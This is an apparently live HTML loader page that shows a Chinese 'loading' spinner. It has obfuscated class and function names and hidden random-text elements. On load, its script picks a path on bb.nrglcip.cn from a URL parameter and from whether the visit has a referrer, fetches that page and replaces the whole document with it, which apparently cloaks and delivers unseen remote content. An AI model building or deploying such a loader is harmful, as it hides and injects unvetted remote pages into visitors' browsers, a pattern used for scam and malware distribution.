<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .dHNdhsXk53b {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .dHNdhsXk53b .ZBeTVu {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .dHNdhsXk53b .content {
            line-height: 50px;
            text-align: center
        }

        .dHNdhsXk53b .img {
            width: 100%
        }

        .dHNdhsXk53b .tPkHHlU {
            text-align: center
        }

        .dHNdhsXk53b .tPkHHlU span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .dHNdhsXk53b .tPkHHlU span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .dHNdhsXk53b .tPkHHlU span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .dHNdhsXk53b .tPkHHlU span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .dHNdhsXk53b .tPkHHlU span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .dHNdhsXk53b .tPkHHlU span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .dHNdhsXk53b .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ntWCYBAZPtIgH(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var lb3DJ = ntWCYBAZPtIgH('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ lb3DJ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ lb3DJ +".html?a=share";
		}
		
        MqAkElStF=url+"#"+new Date().getTime();
        MqAkElStF && function() {
            $.get(MqAkElStF, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >DJXQaSSDl1Qd3pxMYpnXQTEPAAF15S</b>
<div style='display:none'>oi3YmU17274h63xBNV7i63EwJKBCtfG0yBgENg2dizZ7hOThfZH5vNfCR</div>
<span style='display:none'>eiV6IhSnp4JHmJI</span>
<a  href='#' style='display:none'>UCuoSC8ueMMAGrTR4wmeca0w4kdiDqgYlQpnkAaSO2VXT23n4jaTNV8I7TaMtx0rLBbnuw</a>
<div style='display:none'>oi3YmU17274h63xBNV7i63EwJKBCtfG0yBgENg2dizZ7hOThfZH5vNfCR</div>
<span style='display:none'>eiV6IhSnp4JHmJI</span><div class="dHNdhsXk53b">
    <div class="ZBeTVu">
        <div class="tPkHHlU">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >MEsIqd7r5vc3rRqgYObl0SIMY5ygrx6uZwktBZZ4cjE5FcUfnv8ZFQEo3Ad</h1>
<li style='display:none' >xAhPxCwhEUpdHLjnZ2lvNu7QWPViPYxefam2LJY4rpnX1qSq6BHPd0P</li>
<li style='display:none' >xAhPxCwhEUpdHLjnZ2lvNu7QWPViPYxefam2LJY4rpnX1qSq6BHPd0P</li>
<h1 style='display:none' >MEsIqd7r5vc3rRqgYObl0SIMY5ygrx6uZwktBZZ4cjE5FcUfnv8ZFQEo3Ad</h1>
<ul style='display:none' >XTU2qkLbqSIgcRJNEYj21qZ</ul>
<div style='display:none'>kK1AZWXcMBhwSanNvPr</div>
<li style='display:none' >xAhPxCwhEUpdHLjnZ2lvNu7QWPViPYxefam2LJY4rpnX1qSq6BHPd0P</li></body>
</html>